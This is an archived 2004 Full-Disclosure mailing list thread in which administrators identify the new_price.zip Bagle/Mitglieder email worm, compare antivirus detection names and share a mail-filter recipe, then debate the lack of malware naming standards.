Mailing List Archive: Full Disclosure: Full-Disclosure

(no subject)

1 2 3 4 5 6 7 8

View All

Full Disclosure full-disclosure RSS feed

Index | Next | Previous | View Threaded

joe at joesmith

Aug 9, 2004, 12:49 PM

Post #51 of 181 (4400 views)
Permalink

Re: (no subject) [In reply to]

Kaspersky detect it as I-Worm.Bagle.al

Todd Towles wrote:

>I am seeing a lot of them too. Just had a call from my e-mail people. I have
>one that is new_price.zip (5KB)
>
>There appears to be some people on FD that are infected and we are getting a
>lot on my end.
>
>-----Original Message-----
>From: full-disclosure-admin [at] lists
>[mailto:full-disclosure-admin [at] lists] On Behalf Of Jonathan
>Grotegut
>Sent: Monday, August 09, 2004 2:04 PM
>To: Full-disclosure
>Subject: RE: [Full-Disclosure] (no subject)
>
>(In regards to new_price.zip file attachment)
>
>Anyone have any idea what this is, we had some clients just get pretty
>hard with this email. I am unable to find anything on it, from my VERY
>Limited knowledge it appears to be a virus exploiting one of the many
>holes in IE. Anyone else see anything on this yet?
>
>Jonathan Grotegut
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

mike at erdelynet

Aug 9, 2004, 1:07 PM

Post #52 of 181 (4406 views)
Permalink

Re: (no subject) [In reply to]

ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today.

From ClamAV Update list:
Submission: 5025-web, 5026-web, 5027-web, 5028-web, 5029-web, 5030-web,
5043-web, 5044-web,
5045-web, 5046-web, 5047-web, 5048-web
Sender: James Stevens, Bill Landry, Henning Spjelkavik, Melanie
Dussiaume, Roman Scheucher, Gunter
Mintzel, Mike Watterson, Martin, Rob Kudyba, wojciech myszka, Philip
Corliss, Kevin Way
Virus: unknown, JS/IllWill (McAfee), JS.Dword.dropper (Bitdefender),
JScript/IE.VM.Exploit (Inoculate)
Alias: TR/RunMe.Dldr.1 (Hbedv)
Added: Trojan.JS.RunMe
Added: Trojan.RunMe
Note: The name may change.
Note: There are more submissions with this; at the moment I'm publishing
just some of them.

-Mike

Jonathan Grotegut wrote:

> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

toddtowles at brookshires

Aug 9, 2004, 1:08 PM

Post #53 of 181 (4408 views)
Permalink

RE: (no subject) [In reply to]

It appears to be what TrendMico calls Beagle.AC - IDE released at 2:30pm

Maybe it is dropping a older Trojan.

-----Original Message-----
From: Paul Szabo [mailto:psz [at] maths]
Sent: Monday, August 09, 2004 3:06 PM
To: jgrotegut [at] directpointe; toddtowles [at] brookshires
Subject: RE: [Full-Disclosure] (no subject)

> Anyone have any idea what this is ...

F-PROT ANTIVIRUS
Program version: 4.4.2
Engine version: 3.14.11

VIRUS SIGNATURE FILES
SIGN.DEF created 9 August 2004
SIGN2.DEF created 9 August 2004
MACRO.DEF created 10 May 2004

message->new__price.zip->price.html Infection: HTML/ObjData [at] ex
message->new__price.zip->price/price.exe is a dropper for W32/Mitglieder.W

Cheers,

Paul Szabo - psz [at] maths http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

sjohnston at cavionplus

Aug 9, 2004, 1:10 PM

Post #54 of 181 (4401 views)
Permalink

RE: (no subject) [In reply to]

I started seeing this earlier. No news from Norton that I can see.

I'm trying to figure out what it does...

Shannon Johnston

On Mon, 2004-08-09 at 13:03, Jonathan Grotegut wrote:
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
--
Shannon Johnston <sjohnston [at] cavionplus>
Cavion Plus

Attachments:

signature.asc (0.18 KB)

daveFD at davewking

Aug 9, 2004, 1:12 PM

Post #55 of 181 (4411 views)
Permalink

Re: (no subject) [In reply to]

F-Secure is reporting it as bangle.al. Looks like it's your basic email
virus with a trojan backdoor.
http://www.f-secure.com/v-descs/bagle_al.shtml

Dave King,
http://www.thesecure.net

Jonathan Grotegut wrote:

>(In regards to new_price.zip file attachment)
>
>Anyone have any idea what this is, we had some clients just get pretty
>hard with this email. I am unable to find anything on it, from my VERY
>Limited knowledge it appears to be a virus exploiting one of the many
>holes in IE. Anyone else see anything on this yet?
>
>Jonathan Grotegut
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

eric at arcticbears

Aug 9, 2004, 1:13 PM

Post #56 of 181 (4404 views)
Permalink

RE: (no subject) [In reply to]

On Mon, August 9, 2004 12:03 pm, Jonathan Grotegut said:
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?

I've seen several dozen of them today... getting pretty annoying. No other
info, though. :|

-Eric

--
arctic bears - email and dns services
http://www.arcticbears.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Michael.Poulin at mascocs

Aug 9, 2004, 1:14 PM

Post #57 of 181 (4399 views)
Permalink

RE: (no subject) [In reply to]

F-Secure is saying that this is a new variant of bagel.
http://www.f-secure.com/weblog/

Michael Poulin

-----Original Message-----
From: full-disclosure-admin [at] lists
[mailto:full-disclosure-admin [at] lists] On Behalf Of Jonathan
Grotegut
Sent: Monday, August 09, 2004 3:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)

Anyone have any idea what this is, we had some clients just get pretty
hard with this email. I am unable to find anything on it, from my VERY
Limited knowledge it appears to be a virus exploiting one of the many
holes in IE. Anyone else see anything on this yet?

Jonathan Grotegut

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

DISCLAIMER:
The information in this electronic mail message is sender's business Confidential and may be legally privileged. It is intended solely for the addressee(s). Access to this Internet electronic mail message by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it is prohibited and may be unlawful. The sender believes that this E-mail and any attachments were free of any virus, worm, Trojan horse, and/or malicious code when sent. This message and its attachments could have been infected during transmission. By reading the message and opening any attachments, the recipient accepts full responsibility for taking protective and remedial action about viruses and other defects. MASCO is not liable for any loss or damage arising in any way from this message or its attachments.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

mike-full at Megaglobal

Aug 9, 2004, 1:24 PM

Post #58 of 181 (4419 views)
Permalink

Re: (no subject) [In reply to]

rskehr at ucdavis

Aug 9, 2004, 1:59 PM

Post #59 of 181 (4402 views)
Permalink

Re: (no subject) [In reply to]

Symantec identifies this as W32.Beagle.AO [at] m

-Bob Kehr

Jonathan Grotegut wrote:

> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Stephen.Agar at bmhcc

Aug 9, 2004, 2:03 PM

Post #60 of 181 (4409 views)
Permalink

RE: (no subject) [In reply to]

> -----Original Message-----
> From: full-disclosure-admin [at] lists
> [mailto:full-disclosure-admin [at] lists] On Behalf Of Michael
> Sent: Monday, August 09, 2004 3:25 PM
> To: Jonathan Grotegut
> Cc: Full-disclosure
> Subject: Re: [Full-Disclosure] (no subject)
>
>
> List of URLs embedded within a price.exe i recieved.
>
>
> -M.
<snip>

All of this is located on the SANS Internet Storm Center site. Bernard
linked to it in his response. http://www.incidents.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

michealespinola at gmail

Aug 9, 2004, 2:05 PM

Post #61 of 181 (4409 views)
Permalink

Re: (no subject) [In reply to]

this Symantec Rapid Release beta will catch it for NAV users, until
they roll-out the next official .def file:

<ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe>

On Mon, 9 Aug 2004 14:32:14 -0500, Todd Towles
<toddtowles [at] brookshires> wrote:
> I am seeing a lot of them too. Just had a call from my e-mail people. I have
> one that is new_price.zip (5KB)
>
> There appears to be some people on FD that are infected and we are getting a
> lot on my end.
>
>
>
> -----Original Message-----
> From: full-disclosure-admin [at] lists
> [mailto:full-disclosure-admin [at] lists] On Behalf Of Jonathan
> Grotegut
> Sent: Monday, August 09, 2004 2:04 PM
> To: Full-disclosure
> Subject: RE: [Full-Disclosure] (no subject)
>
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
-Micheal

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

tremaine at gmail

Aug 9, 2004, 2:29 PM

Post #62 of 181 (4411 views)
Permalink

Re: (no subject) [In reply to]

On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut
<jgrotegut [at] directpointe> wrote:
> (In regards to new_price.zip file attachment)
>
> Anyone have any idea what this is, we had some clients just get pretty
> hard with this email. I am unable to find anything on it, from my VERY
> Limited knowledge it appears to be a virus exploiting one of the many
> holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut

Bagle.aq with mitgleider-like dropper

Procmail recipe (courtesy of offlist associate), use at your own risk.
[code]
:0 BD
* -1000^0
* 300^0 YJuA6wS8WsBr
* 300^0 zGzjbJDCLB96
* 300^0 BOSKHdXH8Blw
* 300^0 dEi3loqk64su
* 300^0 byusWle0odyf
/dev/null
[/code]

price dot html file included in zip:
[code]
<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">

</script>
</head>
[/code]

Definitions available on McAfee and Trend Micro, and it appears
Symantec should have something by about 6pm.

--
Tremaine
IT Security Consultant

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

vh at helith

Aug 9, 2004, 3:42 PM

Post #63 of 181 (4412 views)
Permalink

Re: (no subject) [In reply to]

On Mon, 09 Aug 2004 16:07:02 -0400
Michael Erdely <mike [at] erdelynet> wrote:

> ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT
> today.
>
..
>
> -Mike

ClamAV has problems to filter the HTML-e-Mails.
I received about 4 infected mails even clamscan/clamD know the virii.
ClamScan identify the virii if I scan the atachement saved at the HDD
without problems...

vh

frank at knobbe

Aug 9, 2004, 5:06 PM

Post #64 of 181 (4407 views)
Permalink

Re: (no subject) [In reply to]

On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote:
> BitDefender 7.0/20040809 found [JS.Dword.dropper]
> ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
> eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
> F-Prot 3.15/20040809 found [HTML/ObjData [at] ex]
> Kaspersky 4.0.2.23/20040809 found nothing
> McAfee 4383/20040804 found [JS/IllWill]
> NOD32v2 1.836/20040809 found [Win32/Bagle.AI]
> Norman 5.70.10/20040806 found [W32/Malware]
> Panda 7.02.00/20040809 found [Fichero Sospechoso]
> Sybari 7.5.1314/20040809 found [JS/IllWill]
> Symantec 8.0/20040809 found nothing
> TrendMicro 7.000/20040809 found [HTML_BAGLE.AC]

Isn't the complete lack of naming standardization in the AV industry
simply amazing? Imagine that were the case in science, particular
medicine...

Makes for a nice game of AV bingo though...

-Frank

Attachments:

signature.asc (0.18 KB)

nick at virus-l

Aug 9, 2004, 10:19 PM

Post #65 of 181 (4415 views)
Permalink

Re: (no subject) [In reply to]

The appropriately-named Frank Knobbe wrote:

> Isn't the complete lack of naming standardization in the AV industry
> simply amazing? ...

Much as less than perfect naming coordination bothers me, the amazing
thing is actually that names are coordinated as well as they are
(though especially bad cases such as the mish-mash of mostly generic
and heuristic attempts to detect HTML-embedded vulnerability
exploitation attempts, such as the one you quoted, can certainly be
found to suggest that there is virtually no consistency at all).

Of course, outsiders throwing stones probably shouldn't be expeceted to
understand this.

However, if all AV vendors (and it would have to be all vendors or
market forces would prevent it happening, so guess what is one of the
largest things blocking better naming coordination?) were to agree a
name perfectly before _any_ of them shipped updated detection for new
viruses, it is a better than than fair bet that those same outsiders
would the be ones complaining longest and loudest about how tardy AV
vendors were at shipping "emergency" updates.

> ... Imagine that were the case in science, particular
> medicine...

Or perhaps it would be better to imagine that you made a more
meaningful analogy, such as asking how well you think medicine would do
in maintaining naming consistency if entirely new strains and variants
of viruses and pathological bacteria appeared world-wide at the rate
computer malware proliferates. A little exercise of the grey cells
will likely suggest that they are unlikely to do better in the short
term (i.e. during the outbreak phase), but would probably do much
better longer-term as the dieseases, outbreaks and treatments of
"biological malware" tend to last _MUCH_ longer than their "computer
cousins". If there was much oingoing need to coordinate names I think
the AV industry would do better than it does now, but with the rate at
which new variants appear being what it is, medium-term renaming and
name coordination are both problematic and (generally) seen as having
very little, if any, market value, so few people expend much effort on
such renaming.

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

todd at hostopia

Aug 9, 2004, 11:02 PM

Post #66 of 181 (4415 views)
Permalink

Re: (no subject) [In reply to]

> Isn't the complete lack of naming standardization in the AV industry
> simply amazing? Imagine that were the case in science, particular
> medicine...

No shit. They should at least get together and come up with some common
naming convention. They need to make some common "naming authority", it's
not difficult, we do it all the time with other software and as mentioned,
in all scientific disciplines. Otherwise, things become very convoluted
for us in the know. This is irrelevent to the general population,
but is necessary for the people who have to deal with these things.

How about it "AV guys"? (I mean to be nice here...)

Todd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

nick at virus-l

Aug 10, 2004, 12:10 AM

Post #67 of 181 (4408 views)
Permalink

Re: (no subject) [In reply to]

Todd Burroughs to Frank Knobbe:

> > Isn't the complete lack of naming standardization in the AV industry
> > simply amazing? Imagine that were the case in science, particular
> > medicine...
>
> No shit. They should at least get together and come up with some common
> naming convention. They need to make some common "naming authority", it's
> not difficult, we do it all the time with other software and as mentioned,
> in all scientific disciplines. Otherwise, things become very convoluted
> for us in the know. This is irrelevent to the general population,
> but is necessary for the people who have to deal with these things.

Believe it or not we know, and things are being done about it.

The "scientific disciplines" and others you speak of don't have to deal
with things that happen in any and all possible combinations of as
often, as fast, polymorphically, metamorphically, combinatorially, etc
as the AV industry does _and generally_ have had several generations of
academic research to form, refine, toss out and start over, etc their
classifaction and naming systems. Still, I agree that we AV
researchers could do naming better but there is not sufficient external
pressure to force the industry to try to do a better job of naming than
it currently does so it has no reason to "do the hard yards" that any
significant improvement in naming consistency will require...

> How about it "AV guys"? (I mean to be nice here...)

Other than a few voices wailing within the industry, there are some
much larger scale moves afoot that just may change the "there is not
sufficient external pressure" factor I mentioned above, though
realistically these moves may take years rather than months to produce
significant improvement, but they are a start...

Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

tcleary2 at csc

Aug 10, 2004, 12:38 AM

Post #68 of 181 (4410 views)
Permalink

Re: (no subject) [In reply to]

>> Isn't the complete lack of naming standardization in the AV industry
>> simply amazing? Imagine that were the case in science, particular
>> medicine...
>
>No shit. They should at least get together and come up with some common
>naming convention. They need to make some common "naming authority",
it's
>not difficult, we do it all the time with other software and as
mentioned,
>in all scientific disciplines. Otherwise, things become very convoluted
>for us in the know. This is irrelevant to the general population,
>but is necessary for the people who have to deal with these things.

<heavy_irony>
Of course, you're making the assumption that IT Security Professionals
deserve/get the respect of having a formal "body of knowledge" recognised
by Academia and Government rather than just being a bunch of ungrateful
malcontents fulminating in the wilderness instead of knuckling down to
life as the hired hands of the Corporate Finance section like we bloody
well should, right?
</heavy_irony>

Let the flames begin. ;-)

tom.
----------------------------------------------------------------------------------------
Tom Cleary - Security Architect

CSC Perth

Tel. +61 8 9254 5345 Mobile: 0411208423

tcleary2 [at] csc

"In IT, acceptable solutions depend upon humans - Computers don't
negotiate."
----------------------------------------------------------------------------------------
This is a PRIVATE message. If you are not the intended recipient, please
delete without copying and kindly advise us by e-mail of the mistake in
delivery. NOTE: Regardless of content, this e-mail shall not operate to
bind CSC to any order or other contract unless pursuant to explicit
written agreement or government initiative expressly permitting the use of
e-mail for such purpose.
----------------------------------------------------------------------------------------

Michael.Simpson at inveresk

Aug 10, 2004, 2:00 AM

Post #69 of 181 (4407 views)
Permalink

Re: (no subject) [In reply to]

i've worked within medicine in my previous life as an ER doc and guess
what
there is no formal naming standardisation within it, at least not one that
there is any sort of agreement over, though people have been trying for
centuries to sort something out.
some use latin, some use greek, some use anglified terms, others will use
their own language's interpretations of disease
google helps but the variation between differing nations medical
terminology can lead to a total breakdown in communication when one relies
on a written record.
Also, some of the less obvious jargon is derived from the name of the
company (that owns the patent) that makes the device that's used in the
treament of the disease.
"we threw a quick austin-moore into Mrs McGinty this morning"
using inpenetrable, rapidly-geographically-changing terminology is part of
the mechanism used to obfuscate the publically available knowledge that is
part of the (evil) process of preserving professional autonomy. not a good
thing for medics to do but tends to be repeated in other industries as
well
-three letter acronym anyone?

Frank Knobbe <frank [at] knobbe>
Sent by: full-disclosure-admin [at] lists
10/08/2004 01:06

To
Bernardo Quintero <bernardo [at] hispasec>
cc
full-disclosure [at] netsys
Subject
Re: [Full-Disclosure] (no subject)

On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote:
> BitDefender 7.0/20040809 found [JS.Dword.dropper]
> ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
> eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
> F-Prot 3.15/20040809 found [HTML/ObjData [at] ex]
> Kaspersky 4.0.2.23/20040809 found nothing
> McAfee 4383/20040804 found [JS/IllWill]
> NOD32v2 1.836/20040809 found [Win32/Bagle.AI]
> Norman 5.70.10/20040806 found [W32/Malware]
> Panda 7.02.00/20040809 found [Fichero Sospechoso]
> Sybari 7.5.1314/20040809 found [JS/IllWill]
> Symantec 8.0/20040809 found nothing
> TrendMicro 7.000/20040809 found [HTML_BAGLE.AC]

Isn't the complete lack of naming standardization in the AV industry
simply amazing? Imagine that were the case in science, particular
medicine...

Makes for a nice game of AV bingo though...

-Frank

Attachments:

signature.asc (0.19 KB)

Marek.Isalski at smuht

Aug 10, 2004, 5:08 AM

Post #70 of 181 (4430 views)
Permalink

Re: (no subject) [In reply to]

>>> Michael Simpson <Michael.Simpson [at] inveresk> 10/08/2004 10:00:52 >>>
> i've worked within medicine in my previous life as an ER doc and guess
> what
> there is no formal naming standardisation within it, at least not one that
> there is any sort of agreement over, though people have been trying for
> centuries to sort something out.
>
> -three letter acronym anyone?

I always find the adrenaline/epinephrin naming clash amusing and confusing. Does it stem from a company Trademarking "adrenaline" in the USA? Because, as far as I can tell, everyone uses "adrenaline" as the generic term for the hormone of the same name here in the UK.

Acronyms have their own pitfalls too... I've heard of numerous cases where a derogotary and unprofessional acronym was written on/in some medical notes (PITA, TWOT etc). Perhaps it should be standard practice that when the patient asks to have his/her medical notes explained to him/her, as s/he is quite entitled under the Data Protection Act, the member of staff writing said comment should explain its medical meaning and clinical significance.

The scary part of acronyms comes with overloading. One derogotary (and very unprofessional) acronym I've heard about from a number of years ago was "NFR", meant to stand for "Normal For Ridgehill" (a region with which the local hospital had some "experience").

NFR is more commonly used as an abbreviation for: Not For Resuscitation; from what I understand, NFR is a quite detailed set of circumstances, changing on a frequent basis, stipulating when somebody does not need resuscitation, i.e. are already beyond medical help.

[.disclaimer: i'm not a medic, so any corrections will be educational for me too!]

Marek

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Valdis.Kletnieks at vt

Aug 10, 2004, 7:47 AM

Post #71 of 181 (4410 views)
Permalink

Re: (no subject) [In reply to]

On Tue, 10 Aug 2004 02:02:23 EDT, Todd Burroughs said:

> No shit. They should at least get together and come up with some common
> naming convention. They need to make some common "naming authority", it's
> not difficult, we do it all the time with other software and as mentioned,
> in all scientific disciplines.

Software gets named over days/weeks. They crank out a new name for an element
every few years. These things need names in *MINUTES* - often while the various
A/V companies are looking at different copies of a polymorphic, multi-attack
piece of malware.

5 blind men and an elephant time... and you want them to agree on a name before
they even agree they're looking at the same thing???

frank at knobbe

Aug 10, 2004, 8:13 AM

Post #72 of 181 (4417 views)
Permalink

Re: (no subject) [In reply to]

On Tue, 2004-08-10 at 09:47, Valdis.Kletnieks [at] vt wrote:
> Software gets named over days/weeks. They crank out a new name for an element
> every few years. These things need names in *MINUTES* - often while the various
> A/V companies are looking at different copies of a polymorphic, multi-attack
> piece of malware.

Hey, I didn't say it would be easy, did I?

> 5 blind men and an elephant time... and you want them to agree on a name before
> they even agree they're looking at the same thing???

Obviously not at time of research. But these days everyone is keeping an
ear on the ground... I mean Internet... while they are doing research.
Once one company, which is working on a new strain they term BigNasty,
finds out 3 others are discussion this (on the Internet or private AV
channels) as the SuckThis virus, then they could adopt that name to
avoid confusion.

I didn't say it was easy, but they could at least make an effort.

Here we are a year later and still call it Bagle or Beagle, either one.
I'm still confused if MyDoom-O and MyDoom-M are the same thing or not.

BTW: Perhaps the analogy to medicine was misplaced. I just thought in
term of diseases. How many different names do we have for ...say...
chicken pox or colitis or diabetes? Imagine you had 5 different names
for the flu. I could come up with a dozen Monty Python sketches taking
place in the doctors office....

I didn't say it was easy, but we should "encourage" the AV industry to
work towards such a standardization. It may even be beneficial for them.

Sing with me Valdis....
"I say tomato, you say tomato,
I say potato, you say potato,
I say Beagle, you say Bagle,
and others are calling it something else."

Regards,
Frank (throwing rocks at the glass palace)

Attachments:

signature.asc (0.18 KB)

pauls at utdallas

Aug 10, 2004, 8:20 AM

Post #73 of 181 (4413 views)
Permalink

Re: (no subject) [In reply to]

--On Monday, August 09, 2004 07:06:11 PM -0500 Frank Knobbe
<frank [at] knobbe> wrote:
>
> Isn't the complete lack of naming standardization in the AV industry
> simply amazing? Imagine that were the case in science, particular
> medicine...
>
Getting the AV industry to agree on virus names is about as likely as
getting a government to do anything beneficial for its citizens.

Paul Schmehl (pauls [at] utdallas)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Valdis.Kletnieks at vt

Aug 10, 2004, 8:25 AM

Post #74 of 181 (4404 views)
Permalink

Re: (no subject) [In reply to]

On Tue, 10 Aug 2004 10:13:55 CDT, Frank Knobbe said:

> term of diseases. How many different names do we have for ...say...
> chicken pox or colitis or diabetes? Imagine you had 5 different names
> for the flu.

Diabetes comes in Type 1 and Type 2, which are quite different (in one,
your pancreas quits producing insulin, in the other, the insulin is produced, but
not utilized well by your body).

Influenza comes in many different strains as well - in fact, predicting which
strains will be prevalent and should be included in flu shots is a major
challenge. Strains are usually named after the closest major city to the first
known outbreak, although the one that got loose in 1918 is a special case...

As you were saying?

frank at knobbe

Aug 10, 2004, 8:33 AM

Post #75 of 181 (4411 views)
Permalink

Re: (no subject) [In reply to]

On Tue, 2004-08-10 at 10:25, Valdis.Kletnieks [at] vt wrote:
> Diabetes comes in Type 1 and Type 2, which are quite different (in one,
> your pancreas quits producing insulin, in the other, the insulin is produced, but
> not utilized well by your body).

I know, my wife has type 2. They still call it diabetes.

> As you were saying?

If you missed the point, let me repeat it:
"I believe different names for the same virus confuses consumers and
industry alike. I'd like to urge the industry to start adopting a common
naming convention."

Attachments:

signature.asc (0.18 KB)

1 2 3 4 5 6 7 8

View All

Index | Next | Previous | View Threaded

Interested in having your list archived? Contact Gossamer Threads